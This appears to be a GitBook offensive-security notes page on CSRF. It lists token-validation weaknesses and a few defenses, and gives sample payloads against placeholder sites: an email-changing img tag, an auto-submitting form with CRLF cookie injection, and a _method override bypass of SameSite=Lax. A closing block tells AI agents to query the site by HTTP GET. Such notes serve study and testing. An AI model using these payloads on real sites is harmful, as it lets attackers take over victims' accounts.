# CSRF

Client side request forgery allows an attacker to induce users to perform actions that they do not intend to perform.

## <mark style="color:red;">Deliver a CSRF Exploit</mark>

### <mark style="color:yellow;">**Reflected XSS**</mark>

Attacker will place the malicious HTML onto a web site that they control.

### <mark style="color:yellow;">GET method</mark>

#### <mark style="color:purple;">**Example:**</mark>

```html
<img src="https://vulnerable-website.com/email/change?email=attacker@evil-user.net"> 
```

## <mark style="color:red;">Common CSRF vulnerabilities</mark>

* Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.
* Some applications correctly validate the token when it is present but skip the validation if the token is omitted.
* Some applications do not validate that the token belongs to the same session as the user who is making the request.
* Some applications do tie the CSRF token to a cookie, but not to the same cookie that is used to track sessions.

#### <mark style="color:purple;">**Example:**</mark>

```html
<html>
  <body>
    <form action="https://vul-site.com/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;yahoo&#46;com" />
      <input type="hidden" name="csrf" value="jyLqs10iSdsMQz1S5jqucMF55ZyDRyQL" />
      <input type="submit" value="Submit request" />
    </form>
     <img src="http://vul-site.com/?search=test%0d%0aSet-Cookie:%20csrfKey=your-key" onerror="document.forms[0].submit()"> 
  </body>
</html>
```

* Some applications do not maintain any server-side record of tokens that have been issued.
* Cookie **SomeSite=Lax** bypass via method override.&#x20;
* Change **POST** method to **Get** with **"\_method"** parameter.&#x20;

#### <mark style="color:purple;">Example:</mark>

&#x20;`/change-email?email=attacker@attack.net&_method=POST`

## <mark style="color:red;">Defenses</mark>

* [x] CSRF tokens.
* [x] HTTP cookie header (CSRF-key).
* [x] Captcha.
* [x] HTTP Referrer header.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://smadi0x86-blog.gitbook.io/smadi0x86-playground/offensive-security/web-attacks/client-side/csrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.